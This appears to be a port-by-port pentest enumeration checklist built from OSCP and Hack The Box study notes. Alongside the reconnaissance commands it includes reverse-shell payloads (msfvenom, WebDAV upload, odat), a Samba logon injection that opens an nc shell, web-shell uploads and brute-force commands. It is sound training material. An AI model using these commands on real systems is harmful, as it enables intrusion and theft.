Enumeration
Checklist For Website Enumeration
Start a dirbuster scan after a quick look at the pages.
☐ dirbuster > use /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt (the medium lowercase list)
If nothing is found, run the search again with more file extensions, like: sh, asp, aspx, cgi, txt, cnf, conf, html
If you cannot get any search to work due to errors, use Burp Suite's Site Map feature
When you can't find anything, read through every single document, keeping track in Burp of which ones you have already visited
☐ If you cannot find anything interesting, check whether exploring the webpage revealed more folders and documents to explore
Also check for subdomains if you are running out of ideas
☐ gobuster vhost -u domain.com -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
guess the domain (domain.com) if you don't know it
☐ Check the source code while waiting for directory scan
☐ Check the response headers for interesting information
☐ If SSL is active, view the certificate. It often contains an FQDN that you can add to /etc/hosts to reach a different website on the same host
☐ View all page requests in burp, including the root /. You could be getting redirected to a page but the original page could still be shown in the response. This is an execution after redirect vulnerability.
☐ In burp click Action on a request, and select Do intercept > Response to this request. Change something like “302 Found” to “200 OK” to get it to load
If nmap returns a software version, look for an exploit
☐ use searchsploit -m exploit/path/name.txt to quickly copy the exploit into your current directory
EVEN IF SOMETHING looks like custom software or a random title, google it anyway for exploits - OSCP
If dealing with a login page, look for:
☐ Default credentials, or credentials like admin / admin
Use Burp Suite to brute force logins
Files from the dirbuster search which reveal user information
SQL injection: test with a single quote (')
☐ copy the injectable Burp request to a file and feed it to sqlmap with the -r flag
☐ If you have a form where you can submit messages or other text, try adding:
<img src="http://yourip/test"></img> and
<a href="http://yourip/">click me</a>
Set up a simple netcat listener on port 80 before submitting, so you see whether anything fetches the URL
☐ use davtest -url http://10.10.10.10 to test for file upload and file execution - especially if the nmap scan shows the PUT and MOVE methods
use cadaver 10.10.10.15 to interact with WebDAV
☐ maybe you can't upload and execute the file you need - try uploading the file with an allowed extension and then moving it to the correct extension
To do this, change the request method in Burp from PUT or GET to MOVE /filename.html and directly underneath the first line add Destination: /filename.aspx
If your file upload extension is being blocked, try uploading it with a null byte, e.g. shell.aspx%00.jpg, to trick the check into thinking it is a jpg
☐ Here is how to do it with curl:
1. Generate the aspx reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=lport -f aspx -o revshell.aspx
2. Rename the exploit to a .txt file, because only txt and html files can be uploaded:
mv revshell.aspx revshell.txt
3. Upload revshell.txt:
curl -X PUT http://granny.htb/revshell.txt --data-binary @revshell.txt
4. Rename revshell.txt back to .aspx:
curl -X MOVE --header 'Destination:http://granny.htb/revshell.aspx' 'http://granny.htb/revshell.txt'
5. Start a netcat listener to catch the reverse shell, then request the exploit:
nc -nlvp 14143
curl http://10.10.10.15/revshell.aspx
Nmap
☐ nmap -p- 192.168.1.1 > nmap.ports
cat nmap.ports | awk -F/ '/open/ {b=b","$1} END {print substr(b,2)}'
nmap -p 1,2,3 -sV -oA directory/filename -T4 -sC 192.168.1.1
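The two-step scan above (full port sweep, then a version/script scan on only the open ports) as an added shell example that is not from the original notes: it parses a constructed sample of nmap -p- output, keeps only ports whose STATE column is exactly open (the awk one-liner above matches any line containing "open", so a filtered port running a service named openvpn would slip in), and prints the follow-up command for review instead of running it. The sample output, target and output prefix are constructed.

```shell
#!/bin/sh
# Constructed sample of "nmap -p- 192.168.1.1" output (not from a real scan).
NMAP_PORTS_SAMPLE='Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 12:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
135/tcp   filtered msrpc
443/tcp   open     https
1194/tcp  filtered openvpn
3389/tcp  open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds'

# open_ports: reads nmap output on stdin and prints the open ports as a
# comma-separated list (the format nmap -p expects). Only lines whose STATE
# column is exactly "open" count; "filtered", "closed" and service names that
# merely contain the word "open" are ignored.
open_ports() {
  awk -F/ '$1 ~ /^[0-9]+$/ && $2 ~ /^(tcp|udp)[[:space:]]+open[[:space:]]/ {
             b = b "," $1
           }
           END { print substr(b, 2) }'
}

# service_scan_cmd TARGET PORTS OUTPREFIX: prints the follow-up nmap command
# from the checklist (version detection + default scripts) restricted to the
# open ports. It prints the command rather than running it so the reader can
# review it first; an empty port list is reported as an error.
service_scan_cmd() {
  target=$1; ports=$2; outprefix=$3
  if [ -z "$ports" ]; then
    echo "no open ports found for $target" >&2
    return 1
  fi
  printf 'nmap -p %s -sV -sC -oA %s -T4 %s\n' "$ports" "$outprefix" "$target"
}

# Stand-alone run: the equivalent of
#   nmap -p- 192.168.1.1 > nmap.ports; cat nmap.ports | awk ...
ports=$(printf '%s\n' "$NMAP_PORTS_SAMPLE" | open_ports)
service_scan_cmd 192.168.1.1 "$ports" nmap/192.168.1.1
```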
☐ nmap -sV --script "vuln" 10.10.10.40
nmap -sU -O -p- -oA nmap/udp 10.10.10.3
nmap -sV --script=vulscan/vulscan.nse www.example.com
use -sU to scan udp instead of tcp
use -sT to scan using TCP connect (it takes longer, but is more likely to connect)
For OSCP: rerun your nmap scan a couple of times and also use -T4 -A -O to double check; things don't always show up
Adding A Script
☐ google CVE-2021-41773 nse
download it and add it to /usr/share/nmap/scripts/http-vuln-cve2021-41773.nse
nmap --script-updatedb
nmap -sV -p 443 --script "http-vuln-cve2021-41773" 192.168.50.124
Ports
FTP 21
☐ If you uploaded a file to run via FTP and it did not work, you probably forgot to put the transfer in binary mode. Just type binary in the ftp client to switch
To determine the version of FTP running on a target system, there are a few methods that can be used. One option is to use the nmap tool to scan the target system and identify the version of FTP running. Another option is to establish a connection to the FTP service using a tool such as nc or ftp, and then use the appropriate commands to determine the version:
ftp 192.168.1.101
nc 192.168.1.101 21
nmap -sV 192.168.1.101 -p 21
The Metasploit ftp_version module can also be used to scan a range of IP addresses and determine the version of any FTP servers that are running:
use auxiliary/scanner/ftp/ftp_version
FTP servers may allow anonymous users to access the server with credentials such as:
anonymous : anonymous
anonymous :
ftp :
ftp
The Metasploit ftp_login auxiliary module can be used to perform brute force login attempts:
use auxiliary/scanner/ftp/ftp_login
Mounting A Share
☐ use showmount -e 10.10.10.180 to see if any folders are available to mount. If they are, use:
mount -t nfs 10.10.10.180:/site_backups /tmp/mount to mount it (/tmp/mount can be any folder you want to use)
If you have upload capabilities, look into web payloads. These are payloads you can upload and then access in a browser to run. You will need a payload in whatever format the web server runs code in.
IIS web servers need asp or aspx. The web shells shipped with Kali:
root@kali:~# tree /usr/share/webshells/
/usr/share/webshells/
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php
SSH 22
To determine the version of SSH running on a target system, there are a few methods that can be employed. One option is to use the nmap tool to scan the target system and identify the version of SSH running on it. Another option is to establish a connection to the SSH service using a tool such as nc, and then use the appropriate commands to determine the version.
nc 192.168.1.101 22
nmap -sV 192.168.1.101 -p 22
The Metasploit ssh_login module can be used to perform brute force login attempts.
use auxiliary/scanner/ssh/ssh_login
You only have to do the extra steps (see Trouble Connecting below) if ssh gives you that error; it means the server is old.
If you somehow get an RSA private key, you can log in like this:
☐ ssh dev@10.10.10.79 -i id_rsa where 'id_rsa' is just a file with the key in it (note this includes everything, including the text at the top and bottom). ssh refuses a key file that is readable by others, so chmod 600 id_rsa first.
I don't understand it, but if the above does not work you can 'decrypt' the private key (openssl prompts for the passphrase if the key is encrypted) with:
☐ openssl rsa -in hype_key_encrypted -out hype_key_decrypted
then log in with ssh -i ~/hype_key_decrypted username@10.10.10.79
Brute Force Logins
☐ hydra -l username -P /usr/share/eaphammer/wordlists/rockyou.txt -s 2222 10.10.10.76 -t 4 ssh
or hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
☐ hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" for username brute force with a known password; swap these flags into one of the commands above in place of -l/-P
☐ medusa -u username -P /usr/share/eaphammer/wordlists/rockyou.txt -h 10.10.10.76 -M ssh -n 22022
Trouble Connecting
☐ echo "Host 10.10.10.76" >> ~/.ssh/config
echo "KexAlgorithms +diffie-hellman-group1-sha1" >> ~/.ssh/config
Telnet 23
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet
SMTP 25
To determine the version of SMTP running on a target system, there are several methods that can be employed. One option is to use the nmap tool to scan the target system and identify the version of SMTP running on it. Another option is to establish a connection to the SMTP service using tools such as telnet or nc, and then use appropriate commands to determine the version.
nc 192.168.1.101 25
nmap -sV 192.168.1.101 -p 25
telnet 192.168.1.101 25
The Metasploit SMTP Enumeration module will connect to a given mail server and use a wordlist to enumerate users that are present on the remote system
use auxiliary/scanner/smtp/smtp_enum
The Metasploit open relay module can be used to find out open relay vulnerability in SMTP server
use auxiliary/scanner/smtp/smtp_relay
DNS 53
nslookup
The main way to query those records is by using the following syntax:
$ nslookup -query=<record type> nikosdano.com
Where <record type> is the DNS Record you would like to query. Here are some examples:
Of course, we can also use the ANY record to get as much information as possible.
dig
dig nikosdano.com
As you can see, the default query record is "A". Moreover, the output contains several other pieces of information that make it harder to read. To simplify the output, we will be using these extra parameters in the following commands:
+nocmd – Removes the +cmd options output
+noall – Removes extra headers, flags, time information, message size, etc.
+answer – Tells dig to return the answer section (the “juicy” part of the output).
To specify the record we would like to query, we just have to add the record type right after the domain specification. Here is a basic syntax we will use:
dig +nocmd nikosdano.com <record> +noall +answer
Zone Transfer attack with dig
Let's now see how we can perform one of the most common DNS attacks, caused by misconfigured DNS servers. It is unlikely to see this bug nowadays, but it is worth mentioning. If you are not familiar with Zone Transfer attacks, please have a look at the following links before moving on:
For this example, we will use a deliberately misconfigured server. zonetransfer.me has been set up for this purpose. What we first need to know is the Name Server(s) of zonetransfer.me. By running: $ dig zonetransfer.me NS we can see that there are two available Name Servers. The first is: nsztm1.digi.ninja and the second is: nsztm2.digi.ninja.
Here is the command syntax to attempt a Zone Transfer attack with dig: $ dig axfr @<nameserver> target
So, in our case that we have two Name Servers available, we will use these commands:
dig +nocmd axfr @nsztm1.digi.ninja zonetransfer.me +noall +answer
dig +nocmd axfr @nsztm2.digi.ninja zonetransfer.me +noall +answer
As you can see from the output, we are able to see all the information leaked.
☐ If you see more domains after doing dig axfr example.htb @10.10.10.10 add them in a single line to /etc/hosts like: 10.10.10.123 friendzone.red administrator1.friendzone.red to be able to visit them
Fierce, DNSenum and DNSrecon
Fierce
Fierce will:
• Find out the available Name Servers,
• Try to perform a Zone Transfer attack and finally
• Find the subnets available
• Use a built-in or custom wordlist to brute force subdomains available.
To run the default scan against nikosdano.com run: $ fierce -dns nikosdano.com
Of course, we can specify the DNS server we would like to use for our reverse lookups. To do this, an extra parameter "-dnsserver" is required. So, if we choose to use dns2.registrar-servers.com we can run: $ fierce -dns nikosdano.com -dnsserver dns2.registrar-servers.com
Fierce uses a default wordlist for its tests. We can always specify our own wordlist by using the "-wordlist" parameter. Here is an example: fierce -dns nikosdano.com -wordlist wordlist.txt
Dnsenum
Dnsenum is one of the author’s favorite tool during the DNS Enumeration steps. With a single command, we are able to query several DNS Records (A, MX, NS and more) and also attempt a zone transfer attack, a subdomain enumeration and more. The default command syntax looks like this: $ dnsenum nikosdano.com
From the image, you can see that all the A, NS, and MX records were returned. Moreover, we are able to see the IP of each server returned.
☐ dnsenum --dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb
DNSrecon
DNSrecon will:
• Query all the available DNS records
• Brute force for subdomains
• Attempt Zone Transfer attacks against every NS record
The default command to run is: $ dnsrecon -d nikosdano.com
Again, we are able to specify a name server with the "-n" option. A dictionary for subdomain enumeration can be supplied with the "-D" parameter.
For DNS enumeration, the first thing to do is try to resolve the IPs of Cronos. I’ll use nslookup, setting the server to Cronos, and then looking up Cronos’ IP:
root@kali# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
Knowing the domain ns1.cronos.htb is useful, as it not only provides a domain name to poke at, but also confirms the base domain cronos.htb.
Any time there’s TCP DNS, it’s worth trying a zone transfer, which returns another two subdomains, admin and www:
root@kali# dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 14 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 07 21:08:57 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
I’ll add the following line to my /etc/hosts file:
☐ for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" to search a range of addresses for valid ips
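The dig axfr output above turned into /etc/hosts entries, as an added shell example that is not part of the original notes: it first checks that the transfer actually returned a zone (a transfer that succeeds for an arbitrary client is exactly the misconfiguration described above, so the same check is useful against your own name servers), then groups the A records by address into the single-line hosts format recommended above. The sample transfer, zone name and addresses are constructed.

```shell
#!/bin/sh
# Constructed sample of "dig axfr example.htb @10.10.10.10" output, modelled on
# the Cronos transcript above but with a second address so grouping is visible.
AXFR_SAMPLE='; <<>> DiG 9.18.0 <<>> axfr example.htb @10.10.10.10
;; global options: +cmd
example.htb.            604800  IN  SOA  example.htb. admin.example.htb. 3 604800 86400 2419200 604800
example.htb.            604800  IN  NS   ns1.example.htb.
example.htb.            604800  IN  A    10.10.10.10
admin.example.htb.      604800  IN  A    10.10.10.10
ns1.example.htb.        604800  IN  A    10.10.10.10
www.example.htb.        604800  IN  A    10.10.10.10
backup.example.htb.     604800  IN  A    10.10.10.11
example.htb.            604800  IN  SOA  example.htb. admin.example.htb. 3 604800 86400 2419200 604800
;; Query time: 14 msec'

# axfr_succeeded: exit 0 only if the transfer returned a zone. dig prints the
# SOA record on success; a refused transfer prints "; Transfer failed." and
# no records at all, so the absence of an SOA means nothing was leaked.
axfr_succeeded() {
  awk '$3 == "IN" && $4 == "SOA" { found = 1 } END { exit found ? 0 : 1 }'
}

# axfr_hosts_lines: turn the A records of a transfer into /etc/hosts lines,
# one per address, with every name that resolves to that address on the same
# line. Trailing dots are stripped, duplicates dropped, first-seen order kept.
axfr_hosts_lines() {
  awk '$3 == "IN" && $4 == "A" {
         name = $1; sub(/\.$/, "", name); ip = $5
         if (!(ip in seen)) { seen[ip] = 1; order[++n] = ip }
         if (!((ip, name) in have)) {
           have[ip, name] = 1
           names[ip] = names[ip] " " name
         }
       }
       END { for (i = 1; i <= n; i++) print order[i] names[order[i]] }'
}

# Stand-alone run: only emit hosts lines when the transfer really succeeded,
# so a refused transfer does not silently produce an empty result.
if printf '%s\n' "$AXFR_SAMPLE" | axfr_succeeded; then
  printf '%s\n' "$AXFR_SAMPLE" | axfr_hosts_lines
else
  echo "zone transfer refused or empty" >&2
fi
```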
TFTP 69
TFTP is a trivial file transfer server, like FTP but running over UDP.
Finger 79
☐ Run finger user@10.10.10.10 to gain user information
Run finger admin@10.10.10.10 to gain admin information
Run finger @10.10.10.10 to see logged on users
Run finger username @10.10.10.10 to see info about a specific user
☐ use ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 to brute force usernames
Web 80/443
To determine the version of HTTP running on a target system, several methods can be employed, such as using the nmap tool to scan the target system and identify the version of HTTP running on it, or establishing a connection to the HTTP service using tools such as telnet or nc and using appropriate commands to determine the version.
nc 192.168.1.101 80/443
nmap -sV 192.168.1.101 -p 80/443
telnet 192.168.1.101 80/443
Enumeration using nikto
The Metasploit dir_scanner module can be used to identify the existence of interesting directories in a given directory path.
auxiliary/scanner/http/dir_scanner
☐ hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Pop3 110/995
Portmapper 111
NNTP 119
NTP 123
MSRPC 135
SMB 139/445
Check List:
☐ smbclient -L //10.10.10.10 -L is for list shares. ADMIN$ C$ IPC$ are all default shares
smbclient -U '' -L //10.10.10.10 try guest, anonymous and blank for the value of -U
smbmap -H 10.10.10.10 another tool that helps list access to shares
☐ mount -t cifs //10.10.10.10/RemoteFolder /local/mnt/folder to mount the folder and be able to explore the files locally
☐ If you find a .vhd (virtual hard drive) file follow .vhd to extract credentials
☐ If you have a hash for a user, do smbmap -u username -p ha:sh -H 10.10.10.10 and if successful use psexec to gain a shell
☐ If you have a valid password and can write to default shares you can get a shell with psexec.py administrator@10.10.10.10
One option of the CrackMapExec suite is to brute force SMB. We can use usernames gathered from enumeration and a password list from cewl or Hashcat:
☐ crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
☐ rpcclient -U '' 10.10.10.10
Run a few commands and if you get responses look up enumeration for this. Otherwise if you just get access denied there is nothing here
☐ run command enumdomusers in rpc
run command srvinfo in rpc
☐ If you get errors about "NT_STATUS_PASSWORD_MUST_CHANGE", follow the RPC step below to change the password
☐ run command setuserinfo2 user_name 23 'NewPassword123' in rpc to attempt a password change for a known user whose current password you already know
☐ You can also attempt to reset a password with smbpasswd -U user_name -r 10.10.10.10
Enumerate Hostname
nmblookup -A [ip]
List Shares
smbmap -H [ip]
echo exit | smbclient -L \\\\[ip]
nmap --script smb-enum-shares -p 139,445 [ip]
Check Null Sessions
smbmap -H [ip/hostname]
smbclient \\\\[ip]\\[share name] (use -L, placed right after smbclient, to list shares)
Check for smb Vulnerabilities using nmap
nmap --script smb-vuln* -p 139,445 [ip]
nmap -p 445 --script vuln 10.10.10.4
nmap --script smb-enum-shares.nse -p445 10.10.10.10
If you have access to the logon command in smb, you can try the following to get a shell:
logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
make sure to setup a nc listener. hit enter if prompted for a password
If you have trouble uploading files you can always use:
smbclient -U 'username%password' //10.10.10.97/sharename -c 'put /usr/share/sqlninja/apps/nc.exe nc.exe'
smbclient -N //10.10.10.123/Development -c 'put cmd.php cookie.php'
IMAP 143/993
IMAP lets you access email stored on a server. So imagine that you are on a network at work: the emails you receive are not stored on your computer but on a specific mail server. Every time you look in your inbox, your email client (like Outlook) fetches the emails from the mail server using IMAP.
IMAP is a lot like POP3, but with IMAP you can access your email from various devices, whereas with POP3 you can only access it from one device.
Port 993 is the secure port for IMAP.
SNMP
☐ snmpwalk -c public -v2c 10.10.10.10 checks everything default, below can get more information so run that as well
☐ snmpwalk -c public -v2c 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpwalk -c public -v2c 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpwalk -c public -v2c 10.10.10.10 .1 #Enum all (untested)
☐ snmpbulkwalk -Cr1000 -c public -v2c 10.10.10.10 . > snmpwalk.output the period is important (remove -Cr1000 if not working)
☐ grep -oP '::.*?\.' snmpwalk.output | sort | uniq -c | sort -n
grep interestingname snmpwalk.output | less -S
grep interestingname snmpwalk.output | grep pidnumber to see all info of that pid running
☐ snmp-check 10.10.10.10
☐ nmap --script "snmp* and not snmp-brute" <target>
☐ snmpwalk -c public -v1 -t 10 192.168.50.151 use v for version number and t for time out time, c is the community string normally public but could change
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2 use the table below, or results from the top command, to query certain results
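Post-processing of a saved snmpwalk dump, as an added shell example that is not from the original notes: snmp_object_summary does what the grep | sort | uniq -c one-liner above does, and snmp_process_table joins the hrSWRunName, hrSWRunPath and hrSWRunParameters rows by PID into one line per process, which the grep-by-pid step above does by hand. The sample output is constructed; it also shows why a readable community string is a finding, since every process command line, including any secret passed as an argument, is exposed.

```shell
#!/bin/sh
# Constructed snmpwalk output (HOST-RESOURCES-MIB, as printed with MIBs loaded).
SNMP_SAMPLE='SNMPv2-MIB::sysDescr.0 = STRING: Linux host 5.10.0 #1 SMP x86_64
SNMPv2-MIB::sysName.0 = STRING: host
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.415 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.982 = STRING: "python3"
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init"
HOST-RESOURCES-MIB::hrSWRunPath.415 = STRING: "/usr/sbin/sshd"
HOST-RESOURCES-MIB::hrSWRunPath.982 = STRING: "/usr/bin/python3"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.415 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "/opt/app/backup.py --db-password PLACEHOLDER_SECRET"'

# snmp_object_summary: count rows per object name, like the checklist's
# grep -oP '::.*?\.' ... | sort | uniq -c | sort -n, so you can see at a glance
# which tables (processes, software, interfaces, users) the agent exposes.
snmp_object_summary() {
  sed -n 's/^[^ ]*::\([^.]*\)\..*/\1/p' | sort | uniq -c | sort -n
}

# snmp_process_table: one line per PID, "pid<TAB>name<TAB>path params",
# joining the three hrSWRun* columns that snmpwalk prints as separate tables.
# Values may appear as STRING: "x", STRING: x or "" and are unquoted uniformly.
snmp_process_table() {
  awk -F' = ' '
    $1 ~ /::hrSWRun(Name|Path|Parameters)\./ {
      split($1, k, "."); pid = k[2]
      v = $2; sub(/^STRING: ?/, "", v); gsub(/^"|"$/, "", v)
      if ($1 ~ /hrSWRunName\./) {
        name[pid] = v
        if (!(pid in seen)) { seen[pid] = 1; order[++n] = pid }
      } else if ($1 ~ /hrSWRunPath\./) {
        path[pid] = v
      } else {
        params[pid] = v
      }
    }
    END {
      for (i = 1; i <= n; i++) {
        p = order[i]; cmd = path[p]
        if (params[p] != "") cmd = cmd " " params[p]
        print p "\t" name[p] "\t" cmd
      }
    }'
}

# snmp_process_cmdline PID: the full command line of one PID (the
# "grep pidnumber" step from the checklist, without the noise).
snmp_process_cmdline() {
  snmp_process_table | awk -F'\t' -v pid="$1" '$1 == pid { print $3 }'
}

# Stand-alone run over the constructed dump.
printf '%s\n' "$SNMP_SAMPLE" | snmp_object_summary
printf '%s\n' "$SNMP_SAMPLE" | snmp_process_table
```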
OneSixtyOne
Use this tool to brute force a list of ip addresses for snmp services
☐ echo public > community
echo private >> community
echo manager >> community
☐ for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
☐ onesixtyone -c community -i ips
If you’re seeing iso.3.6.1.2.1.1.1.0 instead of SNMPv2-MIB::sysDescr.0, make sure you have installed the snmp-mibs-downloader and edited the /etc/snmp/snmp.conf file as described in my Sneaky post.
Smux 199
LDAP 389/636
☐ ldapsearch -x -H ldap://support.htb -D '' -w '' -b "DC=support,DC=htb"
ldapsearch -x -H ldap://support.htb -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
If you see “a successful bind must...” then you cannot do anything more anonymously
500/4500 IPsec/IKE VPN
UDP 500 is used for Internet Key Exchange (IKE), which is used to establish an IPsec VPN. There is some recon I can do on the IKE service using ike-scan:
☐ ike-scan -M -A 10.10.10.10 where -M gives multi-line output and -A selects aggressive mode. Look for a pre-shared key hash that you can crack (untested)
IPSEC
Internet Protocol Security (IPSEC) is a suite of tools that are used for securing network traffic at the IP layer. There are two protocols that provide different security assurances:
• Authentication Header (AH) - Provides data integrity (will know if data is modified between senders), data source authentication (will know if the source isn’t what is expected for that connection), and protects against replay attacks.
• Encapsulating Security Payload (ESP) - Provides similar capabilities, plus confidentiality (someone in the middle can't see the data).
There’s also something called Security Associations (SA) which provide a bundle of algorithms to dynamically exchange keys and establish a secure connection over AH or ESP. IKE is one of those.
Modes
Both ESP and AH can operate in two modes:
◇ Transport mode - Provides security services between two hosts, applied to the payload of the IP packet, but the IP headers are left in the clear for routing.
◇ Tunneling - The entire IP packet is encrypted and/or authenticated, and it becomes the payload of a new IP packet with a header to send it to the other end. At the other end, the packet is decrypted and forwarded based on the decrypted headers.
Given it seems unlikely there’s a network behind this host, I’m going to guess I’ll need Transport mode for this host.
I’ll use the strongswan client to connect to the VPN. I’ll install it with:
☐ apt install strongswan
I’ll need to edit /etc/ipsec.conf and /etc/ipsec.secrets to connect.
☐ First the ipsec.secrets file:
# This file holds shared secrets or RSA private keys for authentication.
☐ 10.10.10.10 %any : PSK "Dudecake1!"
☐ Next, ipsec.conf. You might have to change values based on the output of ike-scan. Do not include the # comments, they are only for explanation:
# ipsec.conf - strongSwan IPsec configuration file
config setup
    charondebug="all"
    uniqueids=yes
    strictcrlpolicy=no
conn conceal
    authby=secret                  # try the psk value if not working
    auto=start                     # if start does not work, try auto=add
    ike=3des-sha1-modp1024         # from ike-scan; try adding ! to the end if not working
    esp=3des-sha1!                 # we get this from the snmp config output; try adding ! to the end if not working
    type=transport                 # if you are accessing a subnet you will want tunnel
    keyexchange=ikev1              # from ike-scan
    left=10.10.14.15               # your ip
    right=10.10.10.116             # box you are attacking
    rightsubnet=10.10.10.116[tcp]  # only if the target only has tcp and not udp connections
    ikelifetime=8h                 # revealed in enumeration, would be in base 16 so have to decode. Not sure you need this so try removing
    fragmentation=yes              # only add this if fragmentation appears in the ike-scan output
☐ ifconfig tun0 mtu 1000 as another troubleshooting step if things are not working. can also set value to 1382
• charondebug="all" - be more verbose to help me troubleshoot the connection.
• authby="secret" - use PSK auth.
• ike, esp, and keyexchange are set based on information from ike-scan.
• left and right represent my computer and the target computer.
• type=transport - use ipsec transport mode to connect host to host.
Another example of what a config could look like (these notes were built from two different resources).
Best way to troubleshoot:
look up your error in this documentation
☐ ipsec restart
ipsec up conceal conceal is the conn name in the configuration
☐ instead of that you can also try ipsec start --nofork
With the VPN connected, I can start recon over again and see a lot more
☐ nmap -sT -p- --min-rate 10000 -oA nmap/alltcp_vpn 10.10.10.116 make sure to use -sT when going through vpn or nmap will not work. nmap/alltcp_vpn is only because example had udp disabled
nmap -sC -sV -sT -oA nmap/conceal-tcp-ipsec 10.10.10.10
Modbus 502
Rlogin 513
Rsh 514
RTSP 554
RTSP (Real Time Streaming Protocol) is a stateful protocol built on top of TCP, usually used for streaming video. Many commercial IP cameras run on this port. They often also have a GUI, so look out for that.
Submission 587
Cups 631
SQL Server 1433/1434
Citrix 1494
Oracle 1521
What is a SID? The SID (Service Identifier) is essentially the database name. Depending on the install you may have one or more default SIDs, or even a totally custom DBA-defined SID. Use the following commands to find common SIDs:
☐ odat all -s 10.10.10.82
odat sidguesser -s 10.10.10.82
Running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
☐ odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
☐ /opt/odat-libc2.17-x86_64/odat-libc2.17-x86_64 sidguesser -s 10.10.10.82
Credential Guessing:
includes python script to do it as well
use sqlplus to log in. You cannot do this unless you have a username, password and SID to log in with
☐ sqlplus scott/tiger@10.10.10.82/XE;
This will show the user's permissions, and it seems we don't have many:
☐ select * from user_role_privs;
But we can use sysdba, which logs us in as the system database administrator and gives us more options. This is basically sudo.
☐ sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
☐ select * from user_role_privs;
While odat had indicated that we couldn’t execute files, in fact, we can, with the externaltable method. However, if we look at the help, it can only run an executable, no options allowed. So we’ll use msfvenom to make an exe:
☐ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=8084 -f exe -o shell.exe
odat utlfile -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --putFile \\temp shell.exe shell.exe
odat externaltable -s 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --exec \\temp shell.exe
Note: these plugins are just extensions of odat. In the child nodes there is one called "utlfile", which is where we use the utlfile plugin to upload a web shell and ultimately get root, but as you can see there are countless other paths you can take as well.
utlfile
Here we use the utlfile plugin of odat to upload an aspx web shell. asp and php web shells were also tried but failed, so just go through the list of web shells. We know to upload to \\inetpub\\wwwroot as this is the default file location of an IIS web server; if it was changed you would have to find out where and adjust accordingly. Since the only page of the website is the default launch page, it is reasonable to assume the default paths have not been changed.
☐ odat utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot cookie.aspx /usr/share/webshells/aspx/cmdasp.aspx
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.txt <(echo 0xdf was here)
We will use the /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell. This script loads into the PowerShell environment and then uses it to create a connection and a shell. At the top there are several examples of how to call the shell; we choose one of these, fill in our information, and put it at the bottom of the same file so that after the environment is created it connects back to our IP address.
We host this changed powershell file and then download it with
NFS 2049
MySQL 3306
Armed with a username and password, I can connect with mssqlclient.py. I’ll make sure to use the -windows-auth flag if connecting to windows, and I’m connected:
☐ mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
see my current user’s permissions:
☐ SELECT * FROM fn_my_permissions(NULL, 'SERVER');
check out the databases available:
☐ SELECT name FROM master.sys.databases
